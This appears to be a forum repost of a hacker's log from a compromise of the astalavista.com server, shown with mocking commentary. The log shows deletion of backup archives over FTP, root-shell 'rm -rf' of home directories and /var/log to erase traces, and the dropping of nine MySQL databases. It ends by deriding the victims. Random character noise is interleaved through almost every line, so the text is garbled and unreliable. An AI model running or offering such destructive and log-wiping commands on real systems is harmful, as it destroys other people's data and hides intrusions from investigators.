' X) D" Y2 k$ p( d" n0 [6 U9 a, V-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar
3 b/ P* F* Q) k, ~' p3 c5 x-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar+ F4 E5 i5 {# Z
[snip]
( D' `2 u1 t, l" G226 Transfer complete.
# j% Q) F. C0 `ftp> mdelete *
; K4 E0 v' l! S3 k! @. Gftp> ls -la
?, ~0 W+ h2 \/ a227 Entering Passive Mode (212,254,194,163,2,193)
6 Z* \3 @+ D5 O" _ d150 Opening BINARY mode data connection for ‘file list’.
* ]4 O( g8 A$ V1 a# _226 Transfer complete.
% o% j! m; w Y$ O3 _ftp>- R% ^# A% ~- p t) T0 ^; K8 N+ @
) Y- b; Y; Y3 Q! v2 _: h4 h+ n5 A
sh-3.2# cd /home
( W* q) }. q" Q, B& C( z# Csh-3.2# ls -la
. X: S' j' m1 B3 p6 Etotal 120. H' E# o: A3 s) a- ^! k$ E4 W% I
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
1 r3 q8 h! |: k2 Tdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..& t. }# m& H0 _' L
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin3 Y+ I' j9 W6 c( `1 u7 K% w
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
* _# ?1 o* e J0 u. [4 i$ O-rw——- 1 root root 8192 Jun 3 02:45 aquota.user& q; b% J5 R: R
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
/ G0 ?. e# v# V) C6 n) r* F( M idrwxr-xr-x 2 root root 4096 Jul 29 2008 backup
) E+ ~3 q/ ~1 D% t' Ddrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161$ G) R# u+ k# e, X' |
drwx–x–x 10 com com 4096 Apr 28 12:40 com) m9 X9 P+ p* @
drwxr-xr-x 2 root root 4096 May 17 2007 ftp5 c$ R6 [8 ~# R# `0 d( H9 `
drwx—— 3 jon jon 4096 Sep 21 2007 jon$ U& z6 }+ E: A% w2 `/ z2 a
drwx—— 2 root root 16384 Sep 11 2007 lost+found2 v6 a3 Z! }4 C" ?
drwxr-xr-x 2 root root 4096 Sep 14 2007 my) }( z1 S0 p: a9 \
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata' ]0 ?' E7 o2 G: C
drwx—— 2 jon jon 4096 Sep 15 2007 test: ~( P( n" n, z- F" {
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
* v/ z: x& n8 y1 q+ L( U
5 p) a, k+ T$ H/ Msh-3.2# rm -rf backup/' i4 T5 Q7 m9 V$ H
sh-3.2# rm -rf backup.14161/
% k: v- H4 \8 j' H8 q. I# V Fsh-3.2# rm -rf ftp/4 s9 m& N; D! B+ K
sh-3.2# rm -rf jon/' a" W# r2 `; p" A4 }& ~" \( x
sh-3.2# rm -rf my/
3 S: ]; T6 x/ xsh-3.2# rm -rf mysqldata/
3 e5 }( {# ]0 C/ Psh-3.2# rm -rf test/7 U: b+ p' v0 y1 x
sh-3.2# rm -rf tmp/$ Y; \, ?, n0 |, Y) e2 D; ~) u
sh-3.2# cd ~
* z7 ?# c" a' L9 jsh-3.2# rm -rf * B; Q/ H. ^. J7 G
sh-3.2# rm -rf /var/log// V9 h( B. @. [/ v3 j; h
rm: cannot remove directory `/var/log//proftpd’: Directory not empty3 a s- o' x' n/ ?& r
sh-3.2# rm -rf /home/*
- a6 v5 u5 X3 X" s* Bsh-3.2# mysql
2 _7 ~3 V) [9 W7 i7 O$ Q- BWelcome to the MySQL monitor. Commands end with ; or \g.7 R9 j# P, N) p) E7 r" c
Your MySQL connection id is 407156' @9 Q- Z A X7 W; \ d
Server version: 5.0.45-community-log MySQL Community Edition (GPL)8 C! x7 h! X8 `# t
. E' k- V. E, WType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer./ w3 W+ |* X, [- Q: [$ ?( A1 E* {
& e E2 ?& z4 ]' jmysql> show databases;
) z: M% B3 h" u; O6 K5 n, B+———————–+6 O" L# o( D: ]2 y3 G! C Z
| Database |# v7 A' ?( C8 G8 g1 [7 O! |# ?
+———————–+/ h& y q3 L F) ^( |, G+ m
| information_schema |+ a2 A4 y1 B( u% t: _3 v
| astanet_ads |
9 B0 x* p" i: F- }| astanet_mailing_lists |
4 ` V5 }+ f# X| astanet_mediawiki |% B5 Q, x) U0 {4 Q" `
| astanet_membersystem |
4 u5 G: ^* n6 H| com_contrexx |8 h2 _5 h: F6 N: G$ q9 ?, F
| com_contrexx2 |
: J& D6 a; a; h, K2 j| com_contrexx2_live |
; R- n* a+ _; y- F. d| da_roundcube |
6 T1 V8 g! m$ P+ u| dolphin |
2 ]0 X5 C V0 ]7 m- m3 F. V| ideapool |
) Y- e% H+ G& d0 A' A ~$ r. a| mysql |
3 a+ P/ l% M! R0 e# i% u| test |* V4 M% K# Q4 f
| yourmaster |$ F* ]5 E, K# I* t0 B9 m
+———————–+7 c- P3 R& y2 J# `
14 rows in set (0.03 sec)+ C) C: B" O1 t; j
# J( w4 `/ C6 W6 j8 Emysql> drop database astanet_membersystem;, b% F, Q7 R% d! C! b% \, j$ F
droQuery OK, 46 rows affected (0.81 sec)" p; y8 ? x9 \0 [
, ~6 {4 Z- U, h0 z0 J! Cmysql> drop database com_contrexx;
3 d9 K% F, ~0 E k" `Query OK, 211 rows affected (2.72 sec)9 x& X; o Z3 d5 k- j5 }6 o* ]
' C' s; S$ _( h6 I" p/ r! Jmysql> drop database com_contrexx2;8 b2 Q' y! w0 v3 L
Query OK, 237 rows affected (2.23 sec)
/ y! t( e6 A# H8 |0 o9 b+ [
+ ?3 T7 b4 \: Bmysql> drop database com_contrexx2_live;
& U; @/ ^1 D# [/ z/ S* G+ H) M0 i% @Query OK, 227 rows affected (7.63 sec)
0 ^8 X! N0 G! p+ S3 U5 S0 z: G% P3 R4 _: t
mysql> drop database ideapool;) e& N4 Q: e9 _& V
Query OK, 69 rows affected (0.19 sec)8 A9 X% J Y `6 ?$ U
" q/ D+ u6 R8 v
mysql> drop database yourmaster;; [4 |% [. Y& T, e1 C- k2 s' D
Query OK, 158 rows affected (0.55 sec)
* N/ W* @4 }$ T1 z
" X1 l3 n6 H$ t( x, nmysql> drop database astanet_ads;
0 R% E$ u7 Q4 {+ u5 f$ ^3 u# ~Query OK, 9 rows affected (0.11 sec)
6 J5 {+ ~; s5 q% r1 N g0 s
5 x4 z# U- K# j5 D2 D+ } Y7 vmysql> drop database astanet_mailing_lists;
8 t% |6 d: `: O, _Query OK, 24 rows affected (1.47 sec)
0 j; ?' p, n# B
- ?% r9 M! ?; n2 m+ u5 Amysql> drop database astanet_mediawiki;
( H" Q: e4 R4 i' C+ m, _/ e1 F" HQuery OK, 31 rows affected (0.51 sec)4 J0 ~- r( b- ?+ F6 Y& L; B8 m
+ J5 s' b8 f3 n9 a: y
mysql> show databases;
* \$ F4 F; H( {6 ~+——————–+! b1 _; a4 c6 U' C5 g
| Database |7 j6 M% V- ]* P2 i( M! ]
+——————–+
0 O# l- u0 {: W1 D7 ^0 G8 }0 l| information_schema |
4 g1 g, d# }9 y- G; Z1 v5 p C' [| da_roundcube |, P4 U# N! l+ ]* B" j" P
| dolphin |
; _# ~" p, w0 p6 C( V6 k. @7 V| mysql |' `* F! K( L" q9 q% M5 I8 T" Y r
| test |
6 f$ U; B9 ^5 d& o5 z% W& w( j+——————–+
7 L2 y& {" |9 T2 D5 rows in set (0.00 sec)9 m) `0 h* h: W, A4 l8 m2 F
, d o1 O9 a& _" L0 {, jWhat a journey! We’re not sure exactly why the “Terminator” had any influence on
0 m0 Y' \3 Z5 c0 c& ptheir naming (conventions) but we’re sure Arnold himself wouldn’t be in the2 K, b* ?) x8 N7 ?
wrong to say this pack of morons *wont be back*.+ O1 S7 I! k: ?: R. r( C5 {$ K
|
发表于 2012-11-6 21:07:34
收藏
支持
反对